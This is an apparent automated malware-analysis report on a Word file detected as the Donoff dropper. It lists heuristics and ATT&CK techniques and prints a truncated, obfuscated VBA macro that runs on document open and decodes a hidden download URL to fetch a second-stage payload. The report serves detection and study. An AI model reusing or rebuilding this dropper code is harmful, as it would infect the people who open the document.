MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample contains VBA macros, specifically a Document_Open macro that utilizes CreateObject and CallByName functions, indicating malicious intent. ClamAV identifies this as Doc.Dropper.Donoff-5743527-0, a known dropper family. The VBA script is heavily obfuscated but its structure and the heuristic firings strongly suggest it's designed to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17171 bytes |
SHA-256: 004338b876172bf23e5fe06427a334736e24cedd26f79e3ac9c227378828db62 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function zjvtkw(ByVal EneZhuMLALS As Integer) As String
ZPXML
zfarugwCSxZN 8198
If rShEw(8828, "") Then
PLThskoYeHCkKc
lxEgWVi = 7276
EwxMCKawZQ 4905, "aQs"
XwvRNnfMcSqZ
End If
fOBSFGi = "PQ0N4"
zjvtkw = "R6tkj"
End Function
Private Function ePrLfao() As Integer
VKrjvgueqmynkC False
irBKsGMhRF 2233, "5XCR"
OAsIpuSUqvtIZ
ePrLfao = 5204
End Function
Private Function VindiSyvz() As String
If LcSRSkC(9126) Then
gEodb = 8634
LqIGPV
Else
NKEStekPFcyN True
DPfiaoa
aeYhQfLrlKiAW
End If
ZivhAtaqi = True
VindiSyvz = ""
End Function
Private Sub Document_Open()
JcuJgZSPIbjH.IZLicevjXeIYi
End Sub
Private Function aCxMjUjrbsXJ(ByVal oFtpOCUgJxmoDQ As String, ByVal oZEekeemrBLj As Integer) As Integer
cUAyPOiaSddCS 4374
OyiQWBe
IfppVDOO
If BvfmyAE Then
iPyoWFbuOGJ
Else
cgbweTm = ""
eVZHioPhoCfbw
hPDbCLksMVJ
End If
aCxMjUjrbsXJ = 1337
End Function
Attribute VB_Name = "JcuJgZSPIbjH"
Private Function nCwbCG(ByVal OfDncyUDYx As Object, ByVal mpeAJ As Boolean) As Object
Dim FsvQoHHZNbc As Integer
VkdjxKFoKNGkG = False
Set nCwbCG = OfDncyUDYx
End Function
Public Sub IZLicevjXeIYi()
On Error GoTo RSXBeLPTGQ
SCqVNn.jqpSDuVd
zaYOckZF = True
SCqVNn.GyjBMB
gxDFoqVjbjKB
Exit Sub
XeFzFUU = 5724
RSXBeLPTGQ:
End Sub
Private Sub gxDFoqVjbjKB()
Dim AxwSBciQd As String
Dim dCKrBZLqARM As Integer
RgJxyyxIfMo = "Y2iEU"
PpoZQYGNIe 5737, hXZsZMDazMNynx.UMUkSbtlYu, eNFXoRFTUgE.kfYnCwOcUqCQ("hBXtBtpF:L/GB/XboTTlLhaOLpHiaXcT.TGeLuv/cXaGtvaFlvTovg/BoFOffOiLcveOG12v.XdXFatG", "LHTOvAFBXGJ")
YgevSnglnePKDt = 6867
hXZsZMDazMNynx.qmUoJ 6258, hXZsZMDazMNynx.UMUkSbtlYu
End Sub
Public Function MqIegZ(ByVal scSzihWYjkO As String) As Object
Dim WxdaUDCZU As String
Dim BgdnjGwdjxDp As Boolean
lQkqaMIHx = "Yg"
Set MqIegZ = nCwbCG(CreateObject(scSzihWYjkO), True)
End Function
Private Function TkAaqNiugeFvp(ByVal LtRpyUA As String) As Integer
If kDagfONzf(8404, "eKxnl") Then
gDoIIYKACL = 7354
FgVCrR
uFcMxU
TIIftFLt
eHQUHZLJeGV = "FyU"
Else
GVCPaMtBb
tRLGrCtGKIsP "AA", 4897
McVlthSJHPScKy
End If
IOgdhJZbC 4147, 3708, 9625
TkAaqNiugeFvp = 2465
End Function
Private Sub PpoZQYGNIe(ByVal rdsVXTI As Integer, ByVal ipdXGwe As String, ByVal TcDYWL As String)
Dim iTHIOUdzuOH As Integer
Set odRpYcOEa = LpFfqzxIM.KtAtRybiPuP(TcDYWL, 7913, True)
LpFfqzxIM.Jfaum "cByA", DQlscLn, 3895, odRpYcOEa
GCwslUAvvJnQh = True
hXZsZMDazMNynx.yVzwxTZQ 6655, KiapLRPY.JjeQWAcvbYHjq(2621, odRpYcOEa, "AQ", eNFXoRFTUgE.kfYnCwOcUqCQ("RFiesZNpToZnsOOeBDoFdZyq", "FYODTNiZq")), "", ipdXGwe
End Sub
Private Function DQlscLn() As String
DQlscLn = eNFXoRFTUgE.kfYnCwOcUqCQ("CLa4nKL'tK L/doKw/nLl.oLa.dKK bKiKLnqaYry4 /RfiL/leq", "RKL4q./Y")
End Function
Attribute VB_Name = "eNFXoRFTUgE"
Private Sub BIDOA()
wPnomOxHx False, 4187, False
ETkgWmR 3928, True, 3091
End Sub
Public Function xBbsbbLQ(ByVal FeGDGeBgWXX As String, ByVal MMYhf As Boolean, ByVal tqsXTrBNPTLp As String) As String
Dim vzKMmsu As Boolean
Dim MXeFRRtiP As Integer
RJUnyhRCPQAqM = "wkg"
xBbsbbLQ = FeGDGeBgWXX & tqsXTrBNPTLp
End Function
Private Sub QcEiB()
lBfhu 3835, "FBE", 8764
CpgessZuStQ 5484, 760, 7177
GKMnraxczD = 3182
eEMzA
End Sub
Private Function VgXWEnzFrDTi(ByVal jelFMHhKRXbN As String, ByVal mFttnQyZaWnfV As String) As String
If Not ASYOSPlVIOhOYQ.FKEEQCX("Bg", mFttnQyZaWnfV, jelFMHhKRXbN, "r7k") Then
VgXWEnzFrDTi = mFttnQyZaWnfV
End If
End Function
Private Function iIlHfRgoJ() As Integer
luvwKrYOrMu = "KFyR"
iIlHfRgoJ = 1
End Function
Public Function kfYnCwOcUqCQ(ByVal AyroPtLhDTPjL As String, ByVal MCfmXDvpTMmIOz As String) As String
Dim CqkAbAxlFjnGkC As String
Dim OJmprnU As String
Dim VtSLxNTwNvkEFg As Integer
For TwLbiHU = iIlHfRgoJ To ASYOSPlVIOhOYQ.ULdqCkM(AyroPtLhDTPjL)
CqkAbAxlFjnGkC = VgXWEnzFrDTi(MCfmXDvpTMm
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.